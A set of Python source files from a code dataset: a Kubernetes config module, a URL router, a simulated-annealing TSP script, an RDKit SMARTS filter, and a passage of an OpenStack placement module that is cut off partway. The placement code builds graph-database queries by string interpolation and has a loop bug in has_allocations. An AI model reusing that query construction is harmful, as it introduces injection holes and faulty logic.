+{"seq_id":"633458264","text":"from oslo_config import cfg\n\n\nCONF = cfg.CONF\nkubernetes_opts = [\n cfg.StrOpt('server',\n default='127.0.0.1:8080',\n help='Addres and port for kube-apiserver'),\n cfg.StrOpt('namespace',\n default='ccp',\n help='The name of the namespace'),\n cfg.StrOpt('ca-certs',\n help='The location of the CA certificate files'),\n cfg.StrOpt('key-file',\n help='The location of the key file'),\n cfg.StrOpt('cert-file',\n help='The location of the certificate file')\n]\nkubernetes_opt_group = cfg.OptGroup(name='kubernetes',\n title='Kubernetes client')\nCONF.register_group(kubernetes_opt_group)\nCONF.register_cli_opts(kubernetes_opts, kubernetes_opt_group)\nCONF.register_cli_opts(kubernetes_opts, kubernetes_opt_group)\n\nSCHEMA = {\n 'kubernetes': {\n 'type': 'object',\n 'additionalProperties': False,\n 'properties': {\n 'server': {'type': 'string'},\n 'namespace': {'type': 'string'},\n 'ca_certs': {'anyOf': [{'type': 'string'}, {'type': 'null'}]},\n 'key_file': {'anyOf': [{'type': 'string'}, {'type': 'null'}]},\n 'cert_file': {'anyOf': [{'type': 'string'}, {'type': 'null'}]},\n },\n },\n}\n","sub_path":"fuel_ccp/config/kubernetes.py","file_name":"kubernetes.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"556230813","text":"from rita.misc.facade import Facade\r\n\r\nurls = [\r\n # equal type\r\n {\r\n \"/login\":\"login\"\r\n , \"/logout\":\"logout\"\r\n , \"/articles/search\":\"articles.search\"\r\n , \"/sitemap.xml\":\"sitemap\"\r\n , \"/admin/articles/preview\":\"articles.preview\"\r\n }\r\n \r\n # startswith type\r\n , [\r\n (\"/admin/articles\", \"articles\")\r\n , (\"/admin/templates\", \"templates\")\r\n , (\"/admin/sitevariables\", \"sitevariables\")\r\n , (\"/\", \"index\")\r\n ]\r\n]\r\n\r\nclass MyFacade(Facade):\r\n def __init__(self, debug=True):\r\n self.debug = debug\r\n \r\n def get_handler_class(self, env, routes):\r\n \"\"\"return handler clas from path_info\"\"\"\r\n path_info = env[\"PATH_INFO\"]\r\n\r\n # search handler equals pathinfo\r\n equal_handlers = urls[0]\r\n if path_info in equal_handlers:\r\n return self.get_class(equal_handlers[path_info])\r\n \r\n # search handler startswith pathinfo\r\n startswith_handlers = urls[1]\r\n for route in startswith_handlers:\r\n key, handler_path = route\r\n if path_info.startswith(key):\r\n if path_info.endswith(\"/edit\"):\r\n handler_path += \".edit\"\r\n return self.get_class(handler_path)\r\n\r\n def get_class(self, full_path):\r\n if not full_path.startswith(\"controller.\"):\r\n full_path = \"controller.\" + full_path\r\n \r\n if not full_path.endswith(\".index.Main\"):\r\n full_path += \".index.Main\"\r\n \r\n splited_path = full_path.split('.')\r\n module_path, klass = '.'.join(splited_path[:-1]), splited_path[-1]\r\n module = __import__(module_path, globals(), locals(), [\"\"])\r\n return getattr(module, klass)\r\n \r\n def handle500(self, exception, start_response):\r\n if self.debug == True:\r\n return super().handle500(exception, start_response)\r\n else:\r\n status = \"500 Internal Server Error\"\r\n response_headers = [('Content-Type', 'text/html;charset=utf-8')]\r\n start_response(status, response_headers)\r\n return [\"500 Internal Server Error\" + \" \"*512]\r\n","sub_path":"route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"601731459","text":"from matplotlib import pyplot as plt\nimport numpy as np\n\n# 产生坐标字典\ndef coordinate_init(size):\n coordinate_dict = {}\n coordinate_dict[0] = (0, 0) # 起点是(0,0)\n for i in range(1, size + 1): # 顺序标号随机坐标\n coordinate_dict[i] = (np.random.uniform(0, size), np.random.uniform(0, size)) # 均匀分布的随机数\n coordinate_dict[size + 1] = (0, 0) # 终点是(0,0)\n return coordinate_dict\n\n# 生成距离矩阵\ndef distance_matrix(coordinate_dict, size):\n d = np.zeros((size + 2, size + 2)) # 生成零矩阵\n for i in range(size + 1):\n for j in range(size + 1):\n if (i == j):\n continue\n if (d[i][j] != 0):\n continue # 算过的不再重复计算\n x1 = coordinate_dict[i][0]\n y1 = coordinate_dict[i][1]\n x2 = coordinate_dict[j][0]\n y2 = coordinate_dict[j][1]\n distance = np.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2) # 按照顺序求距离矩阵\n if (i == 0):\n d[i][j] = d[size + 1][j] = d[j][i] = d[j][size + 1] = distance # 消除误差保证矩阵的对称\n else:\n d[i][j] = d[j][i] = distance\n return d\n\n# 计算路径长度\ndef path_length(d_matrix, path_list, size):\n length = 0\n for i in range(size + 1):\n length += d_matrix[path_list[i]][path_list[i + 1]]\n return length\n\n# 二交换法生成新路径\ndef new_path(path_list, size):\n change_head = np.random.randint(1, size + 1)\n change_tail = np.random.randint(1, size + 1)\n if (change_head > change_tail):\n change_head, change_tail = change_tail, change_head # 确定一对路径头尾\n change_list = path_list[change_head:change_tail + 1]\n change_list.reverse() # change_head与change_tail之间的路径反序\n new_path_list = path_list[:change_head] + change_list + path_list[change_tail + 1:]\n return change_head, change_tail, new_path_list\n\n# 计算新旧路径的长度之差\ndef diff_old_new(d_matrix, path_list, new_path_list, head, tail):\n old_length = d_matrix[path_list[head - 1]][path_list[head]] + d_matrix[path_list[tail]][path_list[tail + 1]]\n new_length = d_matrix[new_path_list[head - 1]][new_path_list[head]] + d_matrix[new_path_list[tail]][\n new_path_list[tail + 1]]\n delta_p = new_length - old_length # 被反转的路径内部距离不变\n return delta_p\n\n\nT_start = 2000 # 起始温度\nT_end = 1e-20 # 结束温度\na = 0.995 # 降温速率\nLk = 50 # 内循环次数,马尔科夫链长\nsize = 20\ncoordinate_dict = coordinate_init(size)\nprint(coordinate_dict) # 打印坐标字典\npath_list = list(range(size + 2)) # 初始化路径\nd = distance_matrix(coordinate_dict, size) # 距离矩阵的生成\nbest_path = path_length(d, path_list, size) # 初始化最好路径长度\nprint('初始路径:', path_list)\nprint('初始路径长度:', best_path)\nbest_path_temp = [] # 记录每个温度下最好路径长度\nbest_path_list = [] # 用于记录历史上最好路径\nbalanced_path_list = path_list # 记录每个温度下的平衡路径\nbalenced_path_temp = [] # 记录每个温度下平衡路径(局部最优)的长度\nwhile T_start > T_end:\n for i in range(Lk):\n head, tail, new_path_list = new_path(path_list, size)\n delta_p = diff_old_new(d, path_list, new_path_list, head, tail)\n if delta_p < 0: # 接受状态\n balanced_path_list = path_list = new_path_list\n new_len = path_length(d, path_list, size)\n if (new_len < best_path):\n best_path = new_len\n best_path_list = path_list\n elif np.random.random() < np.exp(-delta_p / T_start): # 以概率接受状态\n path_list = new_path_list\n path_list = balanced_path_list # 继承该温度下的平衡状态(局部最优)\n T_start *= a # 退火\n best_path_temp.append(best_path)\n balenced_path_temp.append(path_length(d, balanced_path_list, size))\nprint('结束温度的局部最优路径:', balanced_path_list)\nprint('结束温度的局部最优路径长度:', path_length(d, balanced_path_list, size))\nprint('最好路径:', best_path_list)\nprint('最好路径长度:', best_path)\nx = []\ny = []\nfor point in best_path_list:\n x.append(coordinate_dict[point][0])\n y.append(coordinate_dict[point][1])\nplt.figure(1)\nplt.subplot(311)\nplt.plot(balenced_path_temp) # 
每个温度下平衡路径长度\nplt.subplot(312)\nplt.plot(best_path_temp) # 每个温度下最好路径长度\nplt.subplot(313)\nplt.scatter(x, y)\nplt.plot(x, y) # 路径图\nplt.grid()\nplt.show()","sub_path":"TSP-SA.py","file_name":"TSP-SA.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
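The elif branch in the annealing loop above is the standard Metropolis acceptance rule; in isolation, with illustrative temperatures:

# A worsening move (delta_p > 0) is accepted with probability
# exp(-delta_p / T), which shrinks as the temperature T falls.
import numpy as np

def accept(delta_p, T):
    return delta_p < 0 or np.random.random() < np.exp(-delta_p / T)

print(np.exp(-1.0 / 2000))  # ~0.9995: nearly always accepted while hot
print(np.exp(-1.0 / 0.01))  # ~0: practically never accepted once cold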
+{"seq_id":"570406474","text":"import sys\nfrom rdkit import Chem\nfrom rdkit.Chem import SaltRemover\n\n\nclass SMARTmatcher:\n\n # Constructor of class#####################################\n def __init__(self, infile, smartfile, outfile, processtrue):\n\n self._infile = infile\n self._smartfile = smartfile\n self._outfile = outfile\n self._smartPatterns = {}\n self._noofmolsread = 0\n self._noofmolswritten = 0\n self._process = processtrue\n\n # pass the smartpattern file###############################\n def parse_smart_queries(self, smartfile):\n\n datareader = open(smartfile, \"r\")\n smartsMol_Tag = {}\n\n for line in datareader.readlines():\n line = line.strip()\n splitline = line.split(\" \")\n try:\n mol = Chem.MolFromSmarts(splitline[0])\n if mol is None:\n print(splitline[1])\n continue\n else:\n smartsMol_Tag[splitline[1]] = mol\n except:\n continue\n return smartsMol_Tag\n\n # parse the smiles########################################\n def parseSmiles(self, smiles):\n\n try:\n mol = Chem.MolFromSmiles(smiles)\n mol = Chem.RemoveHs(mol)\n Remover = SaltRemover.SaltRemover()\n mol = Remover.StripMol(mol)\n Chem.SanitizeMol(mol)\n Chem.SetHybridization(mol)\n Chem.SetAromaticity(mol)\n return mol\n except:\n return None\n\n # matched the smart########################################\n def match_smart_queries(self, smartsQueries, mol):\n\n try:\n result = {}\n for qtag in smartsQueries:\n qsmartMol = smartsQueries[qtag]\n all_matches = mol.GetSubstructMatches(qsmartMol)\n result[qtag] = len(all_matches)\n return result\n except:\n None\n\n ##########################################################\n def getDictKeysAsString(self, d, delim):\n out = \"\"\n for key in d:\n out = out + key + delim\n return out[:-1]\n\n ##########################################################\n def getDictValsAsString(self, d, delim):\n out = \"\"\n for key in d:\n out = out + str(d[key]) + delim\n return out[:-1]\n\n ##########################################################\n def getDictKeyValsAsString(self, d, delim1, delim2):\n out = \"\"\n for key in d:\n out = out + (str(key) + delim1 + str(d[key])) + delim2\n return out[:-1]\n\n ##########################################################\n def updateLastLog(self):\n\n print(\"=========Below smart queries were used==========\")\n for key in self._smartPatterns:\n print(key)\n print(\"=================================================\")\n\n ##########################################################\n def parseLineAndGetMol(self, line, process):\n\n linesplit = line.split(\" \")\n try:\n mol = Chem.MolFromSmiles(linesplit[0])\n if process == 1:\n mol = self.parseSmiles(linesplit[0])\n return mol\n except:\n return None\n\n ##########################################################\n def formatOutput(self, line, smartres, outputstyle):\n\n try:\n if outputstyle == 1:\n output = self.getDictKeyValsAsString(smartres, \":\", \" \")\n output = line + \" \" + output\n return output\n else:\n output = self.getDictValsAsString(smartres, \";\")\n output = line + \" \" + output\n return output\n except:\n return \"None\"\n\n # Run it##################################################\n def runIt(self):\n\n try:\n self._smartPatterns = self.parse_smart_queries(self._smartfile)\n except:\n print(\"Problem in reading smarts query file.\")\n print(\"Exiting for now.\")\n exit()\n\n if len(self._smartPatterns) == 0:\n print(\"No smart queries provided\")\n print(\"Exiting for now.\")\n exit()\n\n try:\n datareader = open(self._infile, \"r\")\n datawriter = 
open(self._outfile, \"w\")\n outdata = {}\n while True:\n\n line = datareader.readline()\n if line is \"\":\n break\n\n line = line.strip()\n linesplit = line.split(\" \")\n smi = linesplit[0]\n tag = \"noname\"\n if len(linesplit) > 1:\n tag = linesplit[1]\n\n mol = self.parseLineAndGetMol(smi, self._process)\n\n if mol is None:\n continue\n\n if mol.GetNumAtoms() < 4:\n continue\n\n res = self.match_smart_queries(self._smartPatterns, mol)\n smi = Chem.MolToSmiles(mol)\n\n if res is None:\n continue\n\n failed = False\n for key in res:\n if res[key] > 0:\n failed = True\n\n if failed:\n continue\n\n outdata[line] = smi+\" \"+tag\n datareader.close()\n\n totalcpdspass = len(outdata)\n for key in outdata:\n datawriter.write(outdata[key]+\"_\"+str(totalcpdspass)+\"\\n\")\n datawriter.close()\n print(\"END\")\n\n except Exception as er:\n print(er)\n print(\"Problem in reading/writing database file.\")\n print(\"Exiting for now.\")\n exit()\n\n\nsm = SMARTmatcher(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])\nsm.runIt()\n","sub_path":"removeCpdsBasedOnSmartsQ.py","file_name":"removeCpdsBasedOnSmartsQ.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"469445237","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport collections\nimport copy\n\n# NOTE(cdent): The resource provider objects are designed to never be\n# used over RPC. Remote manipulation is done with the placement HTTP\n# API. The 'remotable' decorators should not be used, the objects should\n# not be registered and there is no need to express VERSIONs nor handle\n# obj_make_compatible.\n\nfrom oslo_db import api as oslo_db_api\nfrom oslo_db import exception as db_exc\nfrom oslo_log import log as logging\nfrom oslo_utils import excutils\nimport six\n\nfrom placement.db import graph_db as db\nfrom placement import db_api\nfrom placement import exception\nfrom placement.objects import inventory as inv_obj\nfrom placement.objects import research_context as res_ctx\nfrom placement.objects import trait as trait_obj\nfrom placement import resource_class_cache as rc_cache\nfrom placement import util\n\n\nLOG = logging.getLogger(__name__)\n\n\n@db_api.placement_context_manager.writer\ndef get_current_inventory_resources(ctx, rp, include_total=False):\n \"\"\"Returns a set() containing the names of the resource classes for all\n resources currently having an inventory record for the supplied resource\n provider. If 'include_total' is True, the set will contain (rc_name, total)\n tuples instead of just the rc_name.\n\n :param ctx: `placement.context.RequestContext` that may be used to grab a\n DB connection.\n :param rp: Resource provider to query inventory for.\n :param include_total: Determines if we return (rc_name, total) tuples\n (True), or just the rc_names.\n \"\"\"\n rp_uuid = rp if isinstance(rp, six.string_types) else rp.uuid\n query = \"\"\"\n MATCH (rp {uuid: '%s'})-[:PROVIDES]->(rc)\n RETURN labels(rc)[0] AS rc_name, rc.total as rc_total\n \"\"\" % rp_uuid\n result = ctx.tx.run(query).data()\n if include_total:\n resources = [(rec[\"rc_name\"], rec[\"rc_total\"]) for rec in result]\n else:\n resources = [rec[\"rc_name\"] for rec in result]\n return set(resources)\n\n\ndef has_allocations(ctx, rp, rcs=None):\n \"\"\"Returns True if there are any allocations against resources from the\n specified provider. If `rcs` is specified, the check is limited to\n allocations against just the resource classes specified.\n \"\"\"\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-->(inv)<-[:USES]-(cs)\n RETURN labels(inv)[0] AS rc\n \"\"\" % rp.uuid\n result = ctx.tx.run(query).data()\n if not result:\n return False\n if rcs:\n allocs = [rec[\"rc\"] for rec in result]\n for rc in rc:\n if rc in allocs:\n return True\n return False\n return True\n\n\n@db_api.placement_context_manager.reader\ndef get_allocated_inventory(ctx, rp, rcs=None):\n \"\"\"Returns the list of resource classes for any inventory that has\n allocations against it, along with the total amount allocated. 
If `rcs` is\n specified, the returned list is limited to only those resource classes in\n `rcs` that have allocations.\n \"\"\"\n rp_uuid = rp if isinstance(rp, six.string_types) else rp.uuid\n query = \"\"\"\n MATCH p=(rp:RESOURCE_PROVIDER {uuid: '%s'})-->(inv)<-[:USES]-(cs)\n WITH last(relationships(p)) AS usages, labels(inv)[0] AS rcname\n RETURN rcname, sum(usages.amount) AS used\n \"\"\" % rp_uuid\n result = ctx.tx.run(query).data()\n if not result:\n return {}\n allocs = {rec[\"rcname\"]: rec[\"used\"] for rec in result}\n if rcs:\n rcs = set(rcs)\n alloc_keys = set(allocs.keys())\n for alloc_key in alloc_keys - rcs:\n allocs.pop(alloc_key)\n return allocs\n\n\ndef _delete_inventory_from_provider(ctx, rp, to_delete=None):\n \"\"\"Deletes any inventory records from the supplied provider and set() of\n resource class identifiers.\n\n If there are allocations for any of the inventories to be deleted raise\n InventoryInUse exception.\n\n :param ctx: `placement.context.RequestContext` that contains an oslo_db\n Session\n :param rp: Resource provider from which to delete inventory.\n :param to_delete: set() containing resource class names to delete. If\n to_delete is None, all inventory will be deleted.\n \"\"\"\n rp_uuid = rp if isinstance(rp, six.string_types) else rp.uuid\n allocs = get_allocated_inventory(ctx, rp_uuid, rcs=to_delete)\n if allocs:\n alloc_keys = \", \".join(allocs.keys())\n raise exception.InventoryInUse(resource_classes=alloc_keys,\n resource_provider=rp_uuid)\n if to_delete is None:\n to_delete = get_current_inventory_resources(ctx, rp_uuid)\n for rc in to_delete:\n # Delete the providing relationship first\n query = \"\"\"\n MATCH p=(rp {uuid: '%s'})-[:PROVIDES]->(rc:%s)\n WITH relationships(p)[0] AS rel, rc\n DELETE rel\n RETURN id(rc) AS rcid\n \"\"\" % (rp_uuid, rc)\n result = ctx.tx.run(query).data()\n if not result:\n return 0\n else: \n rcid = result[0][\"rcid\"]\n # Now delete the inventory\n query = \"\"\"\n MATCH (inv)\n WHERE id(inv) = %s\n WITH inv\n DELETE inv\n \"\"\" % rcid\n result = ctx.tx.run(query)\n return len(to_delete)\n\n\ndef _add_inventory_to_provider(ctx, rp, inv_list):\n \"\"\"Inserts new inventory records for the supplied resource provider.\n\n :param ctx: `placement.context.RequestContext` that contains an oslo_db\n Session\n :param rp: Resource provider to add inventory to.\n :param inv_list: List of Inventory objects\n \"\"\"\n # First ensure that the RP doesn't contain any inventory for the resources\n # classes to be added.\n rc_to_add = [inv.resource_class for inv in inv_list]\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-[:PROVIDES]->(rc)\n WHERE labels(rc)[0] IN %s\n RETURN labels(rc)[0] AS rc_name\n \"\"\" % (rp.uuid, rc_to_add)\n result = ctx.tx.run(query).data()\n if result:\n raise db_exc.DBDuplicateEntry()\n inv_adds = []\n for inv_rec in inv_list:\n rc_name = inv_rec.resource_class\n rc_atts = [\"allocation_ratio: %s\" % inv_rec.allocation_ratio,\n \"total: %s\" % inv_rec.total,\n \"max_unit: %s\" % inv_rec.max_unit,\n \"min_unit: %s\" % inv_rec.min_unit,\n \"reserved: %s\" % inv_rec.reserved,\n \"step_size: %s\" % inv_rec.step_size,\n ]\n rc_att_str = \", \".join(rc_atts)\n inv_adds.append(\"CREATE (rp)-[:PROVIDES]->(:%s {%s})\" %\n (rc_name, rc_att_str))\n creates = \"\\n\".join(inv_adds)\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n WITH rp\n %s\n \"\"\" % (rp.uuid, creates)\n result = ctx.tx.run(query).data()\n\ndef _update_inventory_for_provider(ctx, rp, inv_list, to_update):\n 
\"\"\"Updates existing inventory records for the supplied resource provider.\n\n :param ctx: `placement.context.RequestContext` that contains an oslo_db\n Session\n :param rp: Resource provider on which to update inventory.\n :param inv_list: List of Inventory objects\n :param to_update: set() containing resource class IDs to search inv_list\n for updating in resource provider.\n :returns: A list of (uuid, class) tuples that have exceeded their\n capacity after this inventory update.\n \"\"\"\n current_allocs = get_allocated_inventory(ctx, rp)\n exceeded = []\n for rc in to_update:\n inv_record = inv_obj.find(inv_list, rc)\n # Get the current inventory\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-->(rc:%s)\n RETURN id(rc) as rcid\n \"\"\" % (rp.uuid, rc)\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.InventoryWithResourceClassNotFound(\n resource_class=rc)\n rcid = result[0][\"rcid\"]\n # Check if the new total - reserved is exceeded\n used = current_allocs.get(rc, 0)\n if inv_record.capacity < used:\n exceeded.append((rp.uuid, rc))\n # Create the update clause\n upds = []\n for att in (\"total\", \"reserved\", \"min_unit\", \"max_unit\", \"step_size\",\n \"allocation_ratio\"):\n upds.append(\"rc.%s=%s\" % (att, getattr(inv_record, att)))\n update_clause = \", \".join(upds)\n # Updated the inventory of the RC node\n query = \"\"\"\n MATCH (rc)\n WHERE id(rc) = %s\n SET %s\n RETURN rc\n \"\"\" % (rcid, update_clause)\n result = ctx.tx.run(query).data()\n return exceeded\n\n\n@db_api.placement_context_manager.writer\ndef _add_inventory(ctx, rp, inventory):\n \"\"\"Add one Inventory that wasn't already on the provider.\n\n :raises `exception.ResourceClassNotFound` if inventory.resource_class\n cannot be found in the DB.\n \"\"\"\n rc = inventory.resource_class\n query = \"\"\"\n MATCH (rc:RESOURCE_CLASS {name: '%s'})\n RETURN rc\n \"\"\" % rc\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.ResourceClassNotFound(resource_class=rc)\n _add_inventory_to_provider(ctx, rp, [inventory])\n rp.increment_generation()\n\n\n@db_api.placement_context_manager.writer\ndef _update_inventory(ctx, rp, inventory):\n \"\"\"Update an inventory already on the provider.\n\n :raises `exception.ResourceClassNotFound` if inventory.resource_class\n cannot be found in the DB.\n \"\"\"\n exceeded = _update_inventory_for_provider(ctx, rp, [inventory],\n set([inventory.resource_class]))\n rp.increment_generation()\n return exceeded\n\n\n@db_api.placement_context_manager.writer\ndef _delete_inventory(ctx, rp, resource_class):\n \"\"\"Delete up to one Inventory of the given resource_class string.\n\n :raises `exception.ResourceClassNotFound` if resource_class\n cannot be found in the DB.\n \"\"\"\n if not _delete_inventory_from_provider(ctx, rp, [resource_class]):\n raise exception.NotFound(\n \"No inventory of class %s found for delete\" % resource_class)\n rp.increment_generation()\n\n\n@db_api.placement_context_manager.writer\ndef _set_inventory(ctx, rp, inv_list):\n \"\"\"Given a list of Inventory objects, replaces the inventory of the\n resource provider in a safe, atomic fashion using the resource\n provider's generation as a consistent view marker.\n\n :param ctx: Session context to use\n :param rp: `ResourceProvider` object upon which to set inventory.\n :param inv_list: A list of `Inventory` objects to save to backend storage.\n :returns: A list of (uuid, class) tuples that have exceeded their\n capacity after this inventory update.\n :raises 
placement.exception.ConcurrentUpdateDetected: if another thread\n updated the same resource provider's view of its inventory or\n allocations in between the time when this object was originally\n read and the call to set the inventory.\n :raises `exception.ResourceClassNotFound` if any resource class in any\n inventory in inv_list cannot be found in the DB.\n :raises `exception.InventoryInUse` if we attempt to delete inventory\n from a provider that has allocations for that resource class.\n \"\"\"\n existing_resources = get_current_inventory_resources(ctx, rp)\n these_resources = set([r.resource_class for r in inv_list])\n\n # Determine which resources we should be adding, deleting and/or\n # updating in the resource provider's inventory by comparing sets\n # of resource class identifiers.\n to_add = these_resources - existing_resources\n to_delete = existing_resources - these_resources\n to_update = these_resources & existing_resources\n exceeded = []\n\n if to_delete:\n _delete_inventory_from_provider(ctx, rp, to_delete)\n if to_add:\n inv_to_add = [inv for inv in inv_list if inv.resource_class in to_add]\n _add_inventory_to_provider(ctx, rp, inv_to_add)\n if to_update:\n exceeded = _update_inventory_for_provider(ctx, rp, inv_list,\n to_update)\n\n # Here is where we update the resource provider's generation value. If\n # this update updates zero rows, that means that another thread has updated\n # the inventory for this resource provider between the time the caller\n # originally read the resource provider record and inventory information\n # and this point. We raise an exception here which will rollback the above\n # transaction and return an error to the caller to indicate that they can\n # attempt to retry the inventory save after reverifying any capacity\n # conditions and re-reading the existing inventory information.\n rp.increment_generation()\n\n return exceeded\n\n\n@db_api.placement_context_manager.reader\ndef _get_provider_by_uuid(ctx, uuid):\n \"\"\"Given a UUID, return a dict of information about the resource provider\n from the database.\n\n :raises: NotFound if no such provider was found\n :param uuid: The UUID to look up\n \"\"\"\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN rp\n \"\"\" % uuid\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.NotFound(\n \"No resource provider with uuid %s found\" % uuid)\n rp = db.pythonize(result[0][\"rp\"])\n return {\"uuid\": rp.uuid,\n \"name\": rp.name,\n \"generation\": rp.generation,\n \"updated_at\": rp.updated_at,\n \"created_at\": rp.created_at,\n }\n\n\n@db_api.placement_context_manager.reader\ndef _get_aggregates_by_provider(ctx, rp):\n \"\"\"Returns a list of UUIDs of any aggregates for the supplied resource\n provider.\n \"\"\"\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-[:ASSOCIATED]-> (agg)\n RETURN agg.uuid AS agg_uuid\n \"\"\" % rp.uuid\n result = ctx.tx.run(query).data()\n return [rec[\"agg_uuid\"] for rec in result]\n\ndef _ensure_aggregate(ctx, agg_uuid):\n \"\"\"Finds an aggregate and returns its UUID (which is the same as the\n supplied parameter). 
If not found, creates the aggregate with the supplied\n UUID and returns the new aggregate's UUID.\n \"\"\"\n query = \"\"\"\n MERGE (agg:AGGREGATE {uuid: '%s'})\n RETURN agg\n \"\"\" % agg_uuid\n result = ctx.tx.run(query).data()\n return agg_uuid\n\n\n@db_api.placement_context_manager.writer\ndef associate(ctx, resource_provider, rp_uuids):\n \"\"\"Associates one or more resource providers with the specified resource\n provider. Note that the relationship is from RP to shared entity, as this\n is needed for resolving :PROVIDES relationships; e.g.:\n (rp)-[:ASSOCIATED]->(share)-[:PROVIDES]->(resource)\n \"\"\"\n # Make sure that the UUID of the resource_provider is not duplicated in the\n # rp_uuids. We don't want to associate an RP with itself!\n if resource_provider.uuid in rp_uuids:\n rp_uuids.remove(resource_provider.uuid)\n query = \"\"\"\n MATCH (share:RESOURCE_PROVIDER {{ uuid: '{rp_uuid}' }})\n WITH share\n MATCH (rp:RESOURCE_PROVIDER)\n WHERE rp.uuid IN {rp_list}\n WITH share, rp\n MERGE (rp)-[:ASSOCIATED]->(share)\n WITH rp, share\n WHERE rp <> share\n RETURN share\"\"\".format(rp_uuid=resource_provider.uuid,\n rp_list=util.makelist(rp_uuids))\n result = ctx.tx.run(query).data()\n\n@db_api.placement_context_manager.writer\ndef _set_aggregates(ctx, resource_provider, provided_aggregates,\n increment_generation=False):\n \"\"\"When aggregate uuids are persisted no validation is done to ensure that\n they refer to something that has meaning elsewhere. It is assumed that code\n which makes use of the aggregates, later, will validate their fitness.\n TODO(cdent): At the moment we do not delete a PlacementAggregate that no\n longer has any associations with at least one resource provider. We may\n wish to do that to avoid bloat if it turns out we're creating a lot of\n noise. 
Not doing now to move things along.\n \"\"\"\n provided_aggregates = set(provided_aggregates)\n existing_aggregates = _get_aggregates_by_provider(ctx,\n resource_provider)\n # A list of aggregate UUIDs that will be associated with the provider\n aggs_to_associate = provided_aggregates - set(existing_aggregates)\n # Same list for those aggregates to remove the association with this\n # provider\n aggs_to_disassociate = [agg_uuid for agg_uuid in existing_aggregates\n if agg_uuid not in provided_aggregates]\n\n if aggs_to_associate:\n stmnt = \"MERGE (agg%s:AGGREGATE {uuid: '%s'})\"\n creates = [stmnt % (num, agg_uuid)\n for num, agg_uuid in enumerate(aggs_to_associate)]\n create_clause = \"\\n\".join(creates)\n agg_withs = \", \".join([\"agg%s\" % num\n for num in range(len(aggs_to_associate))])\n assoc_lines = [\"MERGE (rp)-[:ASSOCIATED]->(agg{num}) \"\n \"WITH rp, {agg_withs} WHERE rp <> agg{num}\".format(\n num=num, agg_withs=agg_withs)\n for num in range(len(aggs_to_associate))]\n assoc_clause = \"\\n\".join(assoc_lines)\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n %s\n WITH rp, %s\n %s\n RETURN rp\n \"\"\" % (resource_provider.uuid, create_clause, agg_withs, assoc_clause)\n result = ctx.tx.run(query).data()\n\n if aggs_to_disassociate:\n # Delete the agg relationships no longer needed\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-[a:ASSOCIATED]->\n (agg:AGGREGATE)\n WITH rp, a, agg\n WHERE agg.uuid in %s\n DELETE a\n \"\"\" % (resource_provider.uuid, aggs_to_disassociate)\n result = ctx.tx.run(query).data()\n if increment_generation:\n resource_provider.increment_generation()\n return\n\n\n@db_api.placement_context_manager.writer\ndef _set_traits(ctx, rp, traits):\n \"\"\"Given a ResourceProvider object and a list of Trait objects, replaces\n the set of traits associated with the resource provider.\n\n :raises: ConcurrentUpdateDetected if the resource provider's traits or\n inventory was changed in between the time when we first started to\n set traits and the end of this routine.\n\n :param rp: The ResourceProvider object to set traits against\n :param traits: List of Trait objects\n \"\"\"\n # Get the list of all trait names\n trait_names = trait_obj.Trait.get_all_names(ctx)\n # Get the traits for this RP\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n WITH rp\n MATCH (t:TRAIT)\n WHERE t.name IN keys(properties(rp))\n RETURN t.name AS trait_name\n \"\"\" % rp.uuid\n result = ctx.tx.run(query).data()\n existing_traits = set([rec[\"trait_name\"] for rec in result])\n new_traits = set([trait.name for trait in traits])\n to_add = new_traits - existing_traits\n to_delete = existing_traits - new_traits\n if not to_add and not to_delete:\n return\n # Remove the traits no longer needed\n del_list = []\n for del_trait in to_delete:\n del_list.append(\"rp.%s\" % del_trait)\n del_clause = \", \".join(del_list)\n if del_clause:\n del_clause = \"REMOVE \" + del_clause\n # Add the new traits, if any\n add_list = []\n for add_trait in to_add:\n add_list.append(\"rp.%s = true\" % add_trait)\n add_clause = \", \".join(add_list)\n if add_clause:\n add_clause = \"SET \" + add_clause\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n %s\n %s\n RETURN rp\n \"\"\" % (rp.uuid, add_clause, del_clause)\n result = ctx.tx.run(query).data()\n rp.increment_generation()\n\n\n@db_api.placement_context_manager.reader\ndef _has_child_providers(ctx, rp_uuid):\n \"\"\"Returns True if the supplied resource provider has any child providers,\n False otherwise\n 
